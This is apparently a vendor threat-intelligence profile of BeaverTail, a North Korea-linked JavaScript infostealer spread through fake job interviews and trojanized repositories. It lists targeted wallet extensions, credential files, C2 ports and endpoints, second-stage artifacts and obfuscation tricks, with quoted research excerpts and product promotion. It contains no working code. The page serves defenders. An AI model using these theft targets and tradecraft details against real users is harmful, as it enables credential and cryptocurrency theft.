BeaverTail
BeaverTail is a JavaScript-based malware family, with reported native C++/Qt variants, used primarily as an infostealer and downloader in North Korea-linked developer-targeting campaigns. Reporting in the provided content consistently links it to DPRK activity clusters and aliases including DeceptiveDevelopment, Contagious Interview, PurpleBravo, Void Dokkaebi/Famous Chollima, DEV#POPPER, and WageMole. It is commonly paired with later-stage malware such as InvisibleFerret, OtterCookie, and in some reporting Tropidoor or TsunamiKit.
Initial access is primarily via social engineering. Observed lures include fake job interviews, coding challenges, malicious JavaScript projects or trojanized repositories on GitHub, GitLab, Bitbucket, and npm-style ecosystems, as well as trojanized conferencing or chat software such as fake MiroTalk/MicroTalk/FreeConference-style applications. Victims are predominantly software developers, especially freelancers and individuals involved in cryptocurrency, Web3, blockchain, and decentralized finance, though broader software engineering and DevOps audiences are also mentioned. The malware has been observed on Windows, Linux, and macOS, including macOS activity in 2025 delivered through job-interview and programming-task lures distributed via gig work sites.
Capabilities described in the content include theft of browser credentials and saved logins, browser extension data, cryptocurrency wallet data, Firefox login databases, macOS Keychain data, Linux keyring data, and Solana keys from .config/solana/id.json. Reported targeted wallet extensions include MetaMask, BNB Chain Wallet, Coinbase Wallet, TronLink, Phantom, Ronin Wallet, Coin98 Wallet, Crypto.com Wallet, Kaia Wallet, Rabby Wallet, Argent X, and Exodus Web3 Wallet. Newer reporting also states that updated variants harvest credentials, private master keys, and seed phrases, and may install trojanized browser extensions targeting MetaMask, Coinbase Wallet, and Phantom.
Operationally, BeaverTail is described as staging collected data in the system temporary directory, exfiltrating stolen data to command-and-control servers, and downloading second-stage payloads. In ESET reporting cited in the content, BeaverTail commonly communicates over ports 1224 or 1244, uploads stolen data to a /uploads endpoint, downloads a Python environment archive named p2.zip, and retrieves the next stage from /client/<campaign_ID>, saving it as .npl in the user home directory. Other reporting notes use of curl, filenames such as p.zi and p2.zip, and likely FTP exfiltration observed between BeaverTail C2 infrastructure and victims. One campaign used BeaverTail disguised as tailwind.config.js alongside a downloader named car.dll; another report describes BeaverTail as a hidden JavaScript loader in malicious repositories that ultimately led to BeaverTail or OtterCookie infection.
The content also describes evolving tradecraft. Some BeaverTail variants use obfuscation such as shuffled Base64 fragments, junk-byte prepending, and XOR encryption. A native C++/Qt variant has been reported, and BeaverTail has also been referenced as part of multi-stage delivery frameworks and blockchain- or dead-drop-adjacent DPRK developer-targeting operations. A campaign marker global['!']='9-0264-2' is explicitly tied in the content to prior Famous Chollima operations and linked to BeaverTail payloads.
High-confidence indicators and artifacts directly mentioned in the content include the malware names BeaverTail/BearVerTail, common disguise filenames such as tailwind.config.js, use of p2.zip and .npl second-stage artifacts, communication over ports 1224/1244, uploads to /uploads, and the campaign marker global['!']='9-0264-2'. The content also notes BeaverTail infections observed in Mexico in 2025.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
10 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
This will eventually to either Ottercookie / Beavertail malware. Running the entire repository ultimately leads to an infection.
Palo Alto Unit 42 : DEV#POPPER , with malware families BeaverTail and InvisibleFerret.
Instructional videos have also been found with what it looks like non-native English text, detailing how to set up a Beavertail malware command-and-control server and how to crack cryptocurrency wallet passwords.
The campaign used the JavaScript infostealer BeaverTail, the cross-platform Python backdoor InvisibleFerret, and most recently OtterCookie, a new backdoor identified in December 2024.
Once run locally on the machine, the package referenced in the supposed project acts as a stealer (i.e., BeaverTail) to harvest browser credentials, cryptocurrency wallet data, macOS Keychain, keystrokes, clipboard content, and screenshots. The malware is designed to download additional payloads, including a cross-platform Python backdoor codenamed InvisibleFerret.
The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
6 techniques
Initial Access
With the unique fingerprint, we identified 77 malicious GitHub repositories... Running the entire repository ultimately leads to an infection.
유명 테스트 프레임워크인 Chai.js의 플러그인으로 위장한 악성 npm 패키지(chai-as-init)가 v1.4.5 ~ v1.4.7까지 총 3개 버전으로 배포
MITRE ATT&CK # T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
Tehdit aktörü önceden sömürmüş olduğu JSON Storage servislerini iş görüşmesi adı altında kişiye iletiyor... Hedef kitle : Yazılımcılar, Yazılım Geliştiriciler, İş aramak için görüşmeler yapan DevOps, DevSecops ekipleri.
After 2–3 friendly exchanges, the recruiter sends "please review the codebase before our technical interview." Calendly link, often on a fresh subdomain.
Foreign IT professionals are contacted as part of a common social engineering tactic that involves enticing software developers with fake job interviews. In this scheme, developers apply for positions advertised on platforms like LinkedIn and other recruitment sites.
Execution
5 techniques
Execution
This will eventually to either Ottercookie / Beavertail malware. Running the entire repository ultimately leads to an infection.
InvisibleFerret is modular Python malware... Finally, the next stage is downloaded from the C&C server ... and executed using the downloaded Python environment.
İlk aşamada malware, BearVerTail adında bir JavaScript dosyasını run ediyor ve Payload yerleşimi başlıyor.
Stealth
3 techniques
Stealth
Dosyalar içerisinde base64 ile encode edilmiş malware tarzında bir payload var... TsunamiKit, base64 ile encode edilmiş bir url yükü taşıyor
Credential Access
4 techniques
Credential Access
If they are found, any .ldb and .log files from the extensions’ directories are collected and exfiltrated. Apart from these files, the malware also targets a file containing the Solana keys stored in the user’s home directory in .config/solana/id.json
The JavaScript-based malware is designed to scan for and exfiltrate sensitive data, with a particular focus on cryptocurrency wallets, browser extension data, and credentials.
Discovery
1 technique
Discovery
Collection
2 techniques
Collection
Command and Control
6 techniques
Command and Control
Instructional videos have also been found... detailing how to set up a Beavertail malware command-and-control server... Another cluster of Beavertail command-and-control (C&C) servers has been administered through VPN, proxies and RDP sessions from the same Russian IP ranges as well.
safe Json Storage servisleri olarak görülen “JsonSilo, JsonKeeper, Npoint” gibi alanları kullanarak meşru bir trafik gibi görünerek saldırıyı devam ettirdikleri... Aslında burada HTTP trafiği izlenerek olay çözümlenmekte
Zscaler... described a two-part infection chain in which the initial reconnaissance took place over HTTP traffic and FTP was used for data exfiltration... Shortly after the reconnaissance traffic, we observed likely exfiltration FTP traffic between the same IP addresses.
Exfiltration
1 technique
Exfiltration
IOCs tracked for this family
314 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
157 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Stealer malware identified as one of the leading observed infections in Mexico in 2025.
Malware associated with the Contagious Interview campaign and described here as used for information theft.
Malware payload family associated with Famous Chollima; in this campaign, the malicious code acts as a JavaScript/Node.js loader that retrieves encrypted payloads from blockchain transaction data.
A DPRK-linked malware family described here as a backdoor/infostealer variant delivered through the same blockchain-based loader architecture.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.